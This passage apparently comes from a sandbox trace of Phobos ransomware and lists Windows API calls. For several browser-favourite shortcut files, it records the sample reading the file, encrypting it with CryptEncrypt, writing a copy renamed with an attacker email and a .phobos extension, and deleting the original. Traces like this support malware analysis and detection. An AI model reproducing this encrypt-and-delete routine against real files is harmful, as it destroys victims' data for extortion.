Autos.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0205.146] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.146] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.146] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.147] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.147] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.148] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.148] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.148] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.148] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.148] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.148] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.148] CloseHandle (hObject=0x178) returned 1 [0205.148] CloseHandle (hObject=0xfc) returned 1 [0205.148] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url")) returned 1 [0205.149] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.155] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.155] CloseHandle (hObject=0x124) returned 1 [0205.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url")) returned 0x20 [0205.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.155] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.155] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.156] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.156] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.156] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.157] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.157] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0205.158] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.158] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.158] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.158] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.158] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.158] CloseHandle (hObject=0x124) returned 1 [0205.158] CloseHandle (hObject=0x160) returned 1 [0205.158] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url")) returned 1 [0205.159] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.161] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.161] CloseHandle (hObject=0x160) returned 1 [0205.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url")) returned 0x20 [0205.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.161] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.161] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.162] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.162] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.162] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.163] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.163] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.164] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0205.164] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.164] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.164] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.164] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.164] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.164] CloseHandle (hObject=0x160) returned 1 [0205.164] CloseHandle (hObject=0x124) returned 1 [0205.164] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url")) returned 1 [0205.165] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.174] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.174] CloseHandle (hObject=0x124) returned 1 [0205.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url")) returned 0x20 [0205.174] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.174] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.174] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.175] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.175] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.175] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.176] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.176] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.177] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0205.177] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.177] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.177] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.177] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.177] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.177] CloseHandle (hObject=0x124) returned 1 [0205.177] CloseHandle (hObject=0x160) returned 1 [0205.177] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url")) returned 1 [0205.178] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.179] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.179] CloseHandle (hObject=0x160) returned 1 [0205.179] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url")) returned 0x20 [0205.179] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.179] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.179] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.180] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.180] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.181] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.181] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.182] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0205.182] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.182] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0205.182] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.182] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0205.182] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.182] CloseHandle (hObject=0x160) returned 1 [0205.182] CloseHandle (hObject=0x124) returned 1 [0205.182] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url")) returned 1 [0205.183] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.187] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=133) returned 1 [0205.187] CloseHandle (hObject=0x124) returned 1 [0205.187] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url")) returned 0x20 [0205.188] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.188] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.188] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.188] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0205.189] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0205.189] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.189] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x85, lpOverlapped=0x0) returned 1 [0205.190] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90, dwBufLen=0x90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x90) returned 1 [0205.190] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x90, lpOverlapped=0x0) returned 1 [0205.190] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0205.190] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.190] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.190] CryptDestroyKey (hKey=0xa32868) returned 1 [0205.190] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, 